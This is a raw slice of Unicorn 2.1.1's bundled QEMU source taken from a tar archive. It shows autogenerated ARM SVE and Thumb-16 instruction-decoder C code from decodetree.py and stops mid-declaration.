/mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:347 */ if (trans_FACGT_ppzz(ctx, &u.f_rprr_esz)) return true; return false; } return false; } return false; case 0x01200000: /* 01100101 ..1..... 0....... ........ */ disas_sve_extract_rda_pg_rn_rm(ctx, &u.f_rprrr_esz, insn); switch ((insn >> 13) & 0x3) { case 0x0: /* 01100101 ..1..... 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:840 */ if (trans_FMLA_zpzzz(ctx, &u.f_rprrr_esz)) return true; return false; case 0x1: /* 01100101 ..1..... 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:841 */ if (trans_FMLS_zpzzz(ctx, &u.f_rprrr_esz)) return true; return false; case 0x2: /* 01100101 ..1..... 010..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:842 */ if (trans_FNMLA_zpzzz(ctx, &u.f_rprrr_esz)) return true; return false; case 0x3: /* 01100101 ..1..... 011..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:843 */ if (trans_FNMLS_zpzzz(ctx, &u.f_rprrr_esz)) return true; return false; } return false; case 0x01208000: /* 01100101 ..1..... 1....... ........ */ disas_sve_extract_rdn_pg_rm_ra(ctx, &u.f_rprrr_esz, insn); switch ((insn >> 13) & 0x3) { case 0x0: /* 01100101 ..1..... 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:848 */ if (trans_FMLA_zpzzz(ctx, &u.f_rprrr_esz)) return true; return false; case 0x1: /* 01100101 ..1..... 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:849 */ if (trans_FMLS_zpzzz(ctx, &u.f_rprrr_esz)) return true; return false; case 0x2: /* 01100101 ..1..... 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:850 */ if (trans_FNMLA_zpzzz(ctx, &u.f_rprrr_esz)) return true; return false; case 0x3: /* 01100101 ..1..... 111..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:851 */ if (trans_FNMLS_zpzzz(ctx, &u.f_rprrr_esz)) return true; return false; } return false; } return false; case 0x42: /* 1000010. ........ ........ ........ */ switch ((insn >> 15) & 0x1) { case 0x0: /* 1000010. ........ 0....... ........ */ switch ((insn >> 23) & 0x3) { case 0x0: /* 10000100 0....... 0....... ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* 10000100 0.0..... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:923 */ disas_sve_extract_rprr_g_load_xs_u(ctx, &u.f_rprr_gather_load, insn); u.f_rprr_gather_load.esz = 2; u.f_rprr_gather_load.msz = 0; u.f_rprr_gather_load.scale = 0; if (trans_LD1_zprz(ctx, &u.f_rprr_gather_load)) return true; return false; case 0x1: /* 10000100 0.1..... 0....... ........ */ disas_sve_extract_disas_sve_Fmt_66(ctx, &u.f_disas_sve32, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 10000100 0.1..... 0....... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:970 */ if (trans_PRF(ctx, &u.f_disas_sve32)) return true; return false; } return false; } return false; case 0x1: /* 10000100 1....... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:925 */ disas_sve_extract_rprr_g_load_xs_u_sc(ctx, &u.f_rprr_gather_load, insn); u.f_rprr_gather_load.esz = 2; u.f_rprr_gather_load.msz = 1; if (trans_LD1_zprz(ctx, &u.f_rprr_gather_load)) return true; return false; case 0x2: /* 10000101 0....... 0....... ........ */ disas_sve_extract_rprr_g_load_xs_sc(ctx, &u.f_rprr_gather_load, insn); switch ((insn >> 14) & 0x1) { case 0x1: /* 10000101 0....... 01...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:927 */ u.f_rprr_gather_load.esz = 2; u.f_rprr_gather_load.msz = 2; u.f_rprr_gather_load.u = 1; if (trans_LD1_zprz(ctx, &u.f_rprr_gather_load)) return true; return false; } return false; case 0x3: /* 10000101 1....... 0....... ........ */ switch ((insn >> 22) & 0x1) { case 0x0: /* 10000101 10...... 0....... ........ */ switch ((insn >> 13) & 0x3) { case 0x0: /* 10000101 10...... 000..... ........ */ disas_sve_extract_pd_rn_i9(ctx, &u.f_rri, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 10000101 10...... 000..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:912 */ if (trans_LDR_pri(ctx, &u.f_rri)) return true; return false; } return false; case 0x2: /* 10000101 10...... 010..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:915 */ disas_sve_extract_rd_rn_i9(ctx, &u.f_rri, insn); if (trans_LDR_zri(ctx, &u.f_rri)) return true; return false; } return false; case 0x1: /* 10000101 11...... 0....... ........ */ disas_sve_extract_disas_sve_Fmt_66(ctx, &u.f_disas_sve32, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 10000101 11...... 0....... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:976 */ if (trans_PRF(ctx, &u.f_disas_sve32)) return true; return false; } return false; } return false; } return false; case 0x1: /* 1000010. ........ 1....... ........ */ switch ((insn >> 22) & 0x1) { case 0x0: /* 1000010. .0...... 1....... ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* 1000010. .00..... 1....... ........ */ switch (insn & 0x00006010) { case 0x00004000: /* 1000010. .00..... 110..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:979 */ disas_sve_extract_disas_sve_Fmt_89(ctx, &u.f_disas_sve47, insn); if (trans_PRF_rr(ctx, &u.f_disas_sve47)) return true; return false; case 0x00006000: /* 1000010. .00..... 111..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:973 */ disas_sve_extract_disas_sve_Fmt_66(ctx, &u.f_disas_sve32, insn); if (trans_PRF(ctx, &u.f_disas_sve32)) return true; return false; } return false; case 0x1: /* 1000010. .01..... 1....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:931 */ disas_sve_extract_rpri_g_load(ctx, &u.f_rpri_gather_load, insn); u.f_rpri_gather_load.esz = 2; if (trans_LD1_zpiz(ctx, &u.f_rpri_gather_load)) return true; return false; } return false; case 0x1: /* 1000010. .1...... 1....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:918 */ disas_sve_extract_disas_sve_Fmt_88(ctx, &u.f_rpri_load, insn); if (trans_LD1R_zpri(ctx, &u.f_rpri_load)) return true; return false; } return false; } return false; case 0x52: /* 1010010. ........ ........ ........ */ switch ((insn >> 13) & 0x7) { case 0x0: /* 1010010. ........ 000..... ........ */ disas_sve_extract_rprr_load_msz(ctx, &u.f_rprr_load, insn); switch ((insn >> 21) & 0x3) { case 0x0: /* 1010010. .00..... 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:961 */ u.f_rprr_load.nreg = 0; if (trans_LD1RQ_zprr(ctx, &u.f_rprr_load)) return true; return false; } return false; case 0x1: /* 1010010. ........ 001..... ........ */ disas_sve_extract_rpri_load_msz(ctx, &u.f_rpri_load, insn); switch ((insn >> 20) & 0x7) { case 0x0: /* 1010010. .000.... 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:966 */ u.f_rpri_load.nreg = 0; if (trans_LD1RQ_zpri(ctx, &u.f_rpri_load)) return true; return false; } return false; case 0x2: /* 1010010. ........ 010..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:937 */ disas_sve_extract_rprr_load_dt(ctx, &u.f_rprr_load, insn); u.f_rprr_load.nreg = 0; if (trans_LD_zprr(ctx, &u.f_rprr_load)) return true; return false; case 0x3: /* 1010010. ........ 011..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:940 */ disas_sve_extract_rprr_load_dt(ctx, &u.f_rprr_load, insn); u.f_rprr_load.nreg = 0; if (trans_LDFF1_zprr(ctx, &u.f_rprr_load)) return true; return false; case 0x5: /* 1010010. ........ 101..... ........ */ disas_sve_extract_rpri_load_dt(ctx, &u.f_rpri_load, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* 1010010. ...0.... 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:943 */ u.f_rpri_load.nreg = 0; if (trans_LD_zpri(ctx, &u.f_rpri_load)) return true; return false; case 0x1: /* 1010010. ...1.... 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:946 */ u.f_rpri_load.nreg = 0; if (trans_LDNF1_zpri(ctx, &u.f_rpri_load)) return true; return false; } return false; case 0x6: /* 1010010. ........ 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:952 */ disas_sve_extract_rprr_load_msz(ctx, &u.f_rprr_load, insn); u.f_rprr_load.nreg = extract32(insn, 21, 2); if (trans_LD_zprr(ctx, &u.f_rprr_load)) return true; return false; case 0x7: /* 1010010. ........ 111..... ........ */ disas_sve_extract_rpri_load_msz(ctx, &u.f_rpri_load, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* 1010010. ...0.... 111..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:958 */ u.f_rpri_load.nreg = extract32(insn, 21, 2); if (trans_LD_zpri(ctx, &u.f_rpri_load)) return true; return false; } return false; } return false; case 0x62: /* 1100010. ........ ........ ........ */ switch ((insn >> 15) & 0x1) { case 0x0: /* 1100010. ........ 0....... ........ */ switch ((insn >> 23) & 0x3) { case 0x0: /* 11000100 0....... 0....... ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* 11000100 0.0..... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:985 */ disas_sve_extract_rprr_g_load_xs_u(ctx, &u.f_rprr_gather_load, insn); u.f_rprr_gather_load.esz = 3; u.f_rprr_gather_load.msz = 0; u.f_rprr_gather_load.scale = 0; if (trans_LD1_zprz(ctx, &u.f_rprr_gather_load)) return true; return false; case 0x1: /* 11000100 0.1..... 0....... ........ */ disas_sve_extract_disas_sve_Fmt_66(ctx, &u.f_disas_sve32, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 11000100 0.1..... 0....... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1013 */ if (trans_PRF(ctx, &u.f_disas_sve32)) return true; return false; } return false; } return false; case 0x1: /* 11000100 1....... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:987 */ disas_sve_extract_rprr_g_load_xs_u_sc(ctx, &u.f_rprr_gather_load, insn); u.f_rprr_gather_load.esz = 3; u.f_rprr_gather_load.msz = 1; if (trans_LD1_zprz(ctx, &u.f_rprr_gather_load)) return true; return false; case 0x2: /* 11000101 0....... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:989 */ disas_sve_extract_rprr_g_load_xs_u_sc(ctx, &u.f_rprr_gather_load, insn); u.f_rprr_gather_load.esz = 3; u.f_rprr_gather_load.msz = 2; if (trans_LD1_zprz(ctx, &u.f_rprr_gather_load)) return true; return false; case 0x3: /* 11000101 1....... 0....... ........ */ disas_sve_extract_rprr_g_load_xs_sc(ctx, &u.f_rprr_gather_load, insn); switch ((insn >> 14) & 0x1) { case 0x1: /* 11000101 1....... 01...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:991 */ u.f_rprr_gather_load.esz = 3; u.f_rprr_gather_load.msz = 3; u.f_rprr_gather_load.u = 1; if (trans_LD1_zprz(ctx, &u.f_rprr_gather_load)) return true; return false; } return false; } return false; case 0x1: /* 1100010. ........ 1....... ........ */ switch ((insn >> 22) & 0x1) { case 0x0: /* 1100010. .0...... 1....... ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* 1100010. .00..... 1....... ........ */ disas_sve_extract_disas_sve_Fmt_66(ctx, &u.f_disas_sve32, insn); switch (insn & 0x00006010) { case 0x00006000: /* 1100010. .00..... 111..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1016 */ if (trans_PRF(ctx, &u.f_disas_sve32)) return true; return false; } return false; case 0x1: /* 1100010. .01..... 1....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1006 */ disas_sve_extract_rpri_g_load(ctx, &u.f_rpri_gather_load, insn); u.f_rpri_gather_load.esz = 3; if (trans_LD1_zpiz(ctx, &u.f_rpri_gather_load)) return true; return false; } return false; case 0x1: /* 1100010. .1...... 1....... ........ */ switch ((insn >> 23) & 0x3) { case 0x0: /* 11000100 01...... 1....... ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* 11000100 010..... 1....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:996 */ disas_sve_extract_rprr_g_load_u(ctx, &u.f_rprr_gather_load, insn); u.f_rprr_gather_load.esz = 3; u.f_rprr_gather_load.msz = 0; u.f_rprr_gather_load.scale = 0; if (trans_LD1_zprz(ctx, &u.f_rprr_gather_load)) return true; return false; case 0x1: /* 11000100 011..... 1....... ........ */ disas_sve_extract_disas_sve_Fmt_66(ctx, &u.f_disas_sve32, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 11000100 011..... 1....... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1010 */ if (trans_PRF(ctx, &u.f_disas_sve32)) return true; return false; } return false; } return false; case 0x1: /* 11000100 11...... 1....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:998 */ disas_sve_extract_rprr_g_load_u_sc(ctx, &u.f_rprr_gather_load, insn); u.f_rprr_gather_load.esz = 3; u.f_rprr_gather_load.msz = 1; if (trans_LD1_zprz(ctx, &u.f_rprr_gather_load)) return true; return false; case 0x2: /* 11000101 01...... 1....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1000 */ disas_sve_extract_rprr_g_load_u_sc(ctx, &u.f_rprr_gather_load, insn); u.f_rprr_gather_load.esz = 3; u.f_rprr_gather_load.msz = 2; if (trans_LD1_zprz(ctx, &u.f_rprr_gather_load)) return true; return false; case 0x3: /* 11000101 11...... 1....... ........ */ disas_sve_extract_rprr_g_load_sc(ctx, &u.f_rprr_gather_load, insn); switch ((insn >> 14) & 0x1) { case 0x1: /* 11000101 11...... 11...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1002 */ u.f_rprr_gather_load.esz = 3; u.f_rprr_gather_load.msz = 3; u.f_rprr_gather_load.u = 1; if (trans_LD1_zprz(ctx, &u.f_rprr_gather_load)) return true; return false; } return false; } return false; } return false; } return false; case 0x72: /* 1110010. ........ ........ ........ */ switch ((insn >> 13) & 0x7) { case 0x0: /* 1110010. ........ 000..... ........ */ disas_sve_extract_pd_rn_i9(ctx, &u.f_rri, insn); switch (insn & 0x01c00010) { case 0x01800000: /* 11100101 10...... 000..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1021 */ if (trans_STR_pri(ctx, &u.f_rri)) return true; return false; } return false; case 0x2: /* 1110010. ........ 010..... ........ */ switch ((insn >> 23) & 0x3) { case 0x0: /* 11100100 0....... 010..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1034 */ disas_sve_extract_rprr_store_esz_n0(ctx, &u.f_rprr_store, insn); u.f_rprr_store.msz = 0; if (trans_ST_zprr(ctx, &u.f_rprr_store)) return true; return false; case 0x1: /* 11100100 1....... 010..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1036 */ disas_sve_extract_rprr_store_esz_n0(ctx, &u.f_rprr_store, insn); u.f_rprr_store.msz = 1; if (trans_ST_zprr(ctx, &u.f_rprr_store)) return true; return false; case 0x2: /* 11100101 0....... 010..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1038 */ disas_sve_extract_rprr_store_esz_n0(ctx, &u.f_rprr_store, insn); u.f_rprr_store.msz = 2; if (trans_ST_zprr(ctx, &u.f_rprr_store)) return true; return false; case 0x3: /* 11100101 1....... 010..... ........ */ switch ((insn >> 22) & 0x1) { case 0x0: /* 11100101 10...... 010..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1024 */ disas_sve_extract_rd_rn_i9(ctx, &u.f_rri, insn); if (trans_STR_zri(ctx, &u.f_rri)) return true; return false; case 0x1: /* 11100101 11...... 010..... ........ */ disas_sve_extract_rprr_store(ctx, &u.f_rprr_store, insn); switch ((insn >> 21) & 0x1) { case 0x1: /* 11100101 111..... 010..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1040 */ u.f_rprr_store.msz = 3; u.f_rprr_store.esz = 3; u.f_rprr_store.nreg = 0; if (trans_ST_zprr(ctx, &u.f_rprr_store)) return true; return false; } return false; } return false; } return false; case 0x3: /* 1110010. ........ 011..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1050 */ disas_sve_extract_rprr_store(ctx, &u.f_rprr_store, insn); u.f_rprr_store.msz = extract32(insn, 23, 2); u.f_rprr_store.nreg = extract32(insn, 21, 2); u.f_rprr_store.esz = extract32(insn, 23, 2); if (trans_ST_zprr(ctx, &u.f_rprr_store)) return true; return false; case 0x4: /* 1110010. ........ 100..... ........ */ disas_sve_extract_rprr_scatter_store(ctx, &u.f_rprr_scatter_store, insn); switch ((insn >> 21) & 0x3) { case 0x0: /* 1110010. .00..... 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1092 */ u.f_rprr_scatter_store.xs = 0; u.f_rprr_scatter_store.esz = 3; u.f_rprr_scatter_store.scale = 0; if (trans_ST1_zprz(ctx, &u.f_rprr_scatter_store)) return true; return false; case 0x1: /* 1110010. .01..... 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1086 */ u.f_rprr_scatter_store.xs = 0; u.f_rprr_scatter_store.esz = 3; u.f_rprr_scatter_store.scale = 1; if (trans_ST1_zprz(ctx, &u.f_rprr_scatter_store)) return true; return false; case 0x2: /* 1110010. .10..... 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1062 */ u.f_rprr_scatter_store.xs = 0; u.f_rprr_scatter_store.esz = 2; u.f_rprr_scatter_store.scale = 0; if (trans_ST1_zprz(ctx, &u.f_rprr_scatter_store)) return true; return false; case 0x3: /* 1110010. .11..... 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1055 */ u.f_rprr_scatter_store.xs = 0; u.f_rprr_scatter_store.esz = 2; u.f_rprr_scatter_store.scale = 1; if (trans_ST1_zprz(ctx, &u.f_rprr_scatter_store)) return true; return false; } return false; case 0x5: /* 1110010. ........ 101..... ........ */ switch ((insn >> 21) & 0x3) { case 0x0: /* 1110010. .00..... 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1073 */ disas_sve_extract_rprr_scatter_store(ctx, &u.f_rprr_scatter_store, insn); u.f_rprr_scatter_store.xs = 2; u.f_rprr_scatter_store.esz = 3; u.f_rprr_scatter_store.scale = 0; if (trans_ST1_zprz(ctx, &u.f_rprr_scatter_store)) return true; return false; case 0x1: /* 1110010. .01..... 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1069 */ disas_sve_extract_rprr_scatter_store(ctx, &u.f_rprr_scatter_store, insn); u.f_rprr_scatter_store.xs = 2; u.f_rprr_scatter_store.esz = 3; u.f_rprr_scatter_store.scale = 1; if (trans_ST1_zprz(ctx, &u.f_rprr_scatter_store)) return true; return false; case 0x2: /* 1110010. .10..... 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1077 */ disas_sve_extract_rpri_scatter_store(ctx, &u.f_rpri_scatter_store, insn); u.f_rpri_scatter_store.esz = 3; if (trans_ST1_zpiz(ctx, &u.f_rpri_scatter_store)) return true; return false; case 0x3: /* 1110010. .11..... 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1081 */ disas_sve_extract_rpri_scatter_store(ctx, &u.f_rpri_scatter_store, insn); u.f_rpri_scatter_store.esz = 2; if (trans_ST1_zpiz(ctx, &u.f_rpri_scatter_store)) return true; return false; } return false; case 0x6: /* 1110010. ........ 110..... ........ */ disas_sve_extract_rprr_scatter_store(ctx, &u.f_rprr_scatter_store, insn); switch ((insn >> 21) & 0x3) { case 0x0: /* 1110010. .00..... 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1094 */ u.f_rprr_scatter_store.xs = 1; u.f_rprr_scatter_store.esz = 3; u.f_rprr_scatter_store.scale = 0; if (trans_ST1_zprz(ctx, &u.f_rprr_scatter_store)) return true; return false; case 0x1: /* 1110010. .01..... 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1088 */ u.f_rprr_scatter_store.xs = 1; u.f_rprr_scatter_store.esz = 3; u.f_rprr_scatter_store.scale = 1; if (trans_ST1_zprz(ctx, &u.f_rprr_scatter_store)) return true; return false; case 0x2: /* 1110010. .10..... 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1064 */ u.f_rprr_scatter_store.xs = 1; u.f_rprr_scatter_store.esz = 2; u.f_rprr_scatter_store.scale = 0; if (trans_ST1_zprz(ctx, &u.f_rprr_scatter_store)) return true; return false; case 0x3: /* 1110010. .11..... 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1057 */ u.f_rprr_scatter_store.xs = 1; u.f_rprr_scatter_store.esz = 2; u.f_rprr_scatter_store.scale = 1; if (trans_ST1_zprz(ctx, &u.f_rprr_scatter_store)) return true; return false; } return false; case 0x7: /* 1110010. ........ 111..... ........ */ disas_sve_extract_rpri_store_msz(ctx, &u.f_rpri_store, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* 1110010. ...0.... 111..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1028 */ u.f_rpri_store.esz = extract32(insn, 21, 2); u.f_rpri_store.nreg = 0; if (trans_ST_zpri(ctx, &u.f_rpri_store)) return true; return false; case 0x1: /* 1110010. ...1.... 111..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1045 */ u.f_rpri_store.nreg = extract32(insn, 21, 2); u.f_rpri_store.esz = extract32(insn, 23, 2); if (trans_ST_zpri(ctx, &u.f_rpri_store)) return true; return false; } return false; } return false; } return false; } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/decode-t16.inc.c������������������������������������������������������0000664�0000000�0000000�00000135511�14675241067�0020775�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* This file is autogenerated by scripts/decodetree.py. */ typedef struct { int F; int I; int im; } arg_disas_t1616; typedef struct { int cond_mask; } arg_disas_t1617; typedef struct { int imm; int nz; int rn; } arg_disas_t1618; #ifdef CONFIG_PRAGMA_DIAGNOSTIC_AVAILABLE # pragma GCC diagnostic push # pragma GCC diagnostic ignored "-Wredundant-decls" # ifdef __clang__ # pragma GCC diagnostic ignored "-Wtypedef-redefinition" # endif #endif typedef arg_s_rrr_shi arg_AND_rrri; static bool trans_AND_rrri(DisasContext *ctx, arg_AND_rrri *a); typedef arg_s_rrr_shi arg_EOR_rrri; static bool trans_EOR_rrri(DisasContext *ctx, arg_EOR_rrri *a); typedef arg_s_rrr_shr arg_MOV_rxrr; static bool trans_MOV_rxrr(DisasContext *ctx, arg_MOV_rxrr *a); typedef arg_s_rrr_shi arg_ADC_rrri; static bool trans_ADC_rrri(DisasContext *ctx, arg_ADC_rrri *a); typedef arg_s_rrr_shi arg_SBC_rrri; static bool trans_SBC_rrri(DisasContext *ctx, arg_SBC_rrri *a); typedef arg_s_rrr_shi arg_TST_xrri; static bool trans_TST_xrri(DisasContext *ctx, arg_TST_xrri *a); typedef arg_s_rri_rot arg_RSB_rri; static bool trans_RSB_rri(DisasContext *ctx, arg_RSB_rri *a); typedef arg_s_rrr_shi arg_CMP_xrri; static bool trans_CMP_xrri(DisasContext *ctx, arg_CMP_xrri *a); typedef arg_s_rrr_shi arg_CMN_xrri; static bool trans_CMN_xrri(DisasContext *ctx, arg_CMN_xrri *a); typedef arg_s_rrr_shi arg_ORR_rrri; static bool trans_ORR_rrri(DisasContext *ctx, arg_ORR_rrri *a); typedef arg_s_rrrr arg_MUL; static bool trans_MUL(DisasContext *ctx, arg_MUL *a); typedef arg_s_rrr_shi arg_BIC_rrri; static bool trans_BIC_rrri(DisasContext *ctx, arg_BIC_rrri *a); typedef arg_s_rrr_shi arg_MVN_rxri; static bool trans_MVN_rxri(DisasContext *ctx, arg_MVN_rxri *a); typedef arg_ldst_rr arg_STR_rr; static bool trans_STR_rr(DisasContext *ctx, arg_STR_rr *a); typedef arg_ldst_rr arg_STRH_rr; static bool trans_STRH_rr(DisasContext *ctx, arg_STRH_rr *a); typedef arg_ldst_rr arg_STRB_rr; static bool trans_STRB_rr(DisasContext *ctx, arg_STRB_rr *a); typedef arg_ldst_rr arg_LDRSB_rr; static bool trans_LDRSB_rr(DisasContext *ctx, arg_LDRSB_rr *a); typedef arg_ldst_rr arg_LDR_rr; static bool trans_LDR_rr(DisasContext *ctx, arg_LDR_rr *a); typedef arg_ldst_rr arg_LDRH_rr; static bool trans_LDRH_rr(DisasContext *ctx, arg_LDRH_rr *a); typedef arg_ldst_rr arg_LDRB_rr; static bool trans_LDRB_rr(DisasContext *ctx, arg_LDRB_rr *a); typedef arg_ldst_rr arg_LDRSH_rr; static bool trans_LDRSH_rr(DisasContext *ctx, arg_LDRSH_rr *a); typedef arg_ldst_ri arg_STR_ri; static bool trans_STR_ri(DisasContext *ctx, arg_STR_ri *a); typedef arg_ldst_ri arg_LDR_ri; static bool trans_LDR_ri(DisasContext *ctx, arg_LDR_ri *a); typedef arg_ldst_ri arg_STRB_ri; static bool trans_STRB_ri(DisasContext *ctx, arg_STRB_ri *a); typedef arg_ldst_ri arg_LDRB_ri; static bool trans_LDRB_ri(DisasContext *ctx, arg_LDRB_ri *a); typedef arg_ldst_ri arg_STRH_ri; static bool trans_STRH_ri(DisasContext *ctx, arg_STRH_ri *a); typedef arg_ldst_ri arg_LDRH_ri; static bool trans_LDRH_ri(DisasContext *ctx, arg_LDRH_ri *a); typedef arg_ri arg_ADR; static bool trans_ADR(DisasContext *ctx, arg_ADR *a); typedef arg_s_rri_rot arg_ADD_rri; static bool trans_ADD_rri(DisasContext *ctx, arg_ADD_rri *a); typedef arg_ldst_block arg_STM; static bool trans_STM(DisasContext *ctx, arg_STM *a); typedef arg_ldst_block 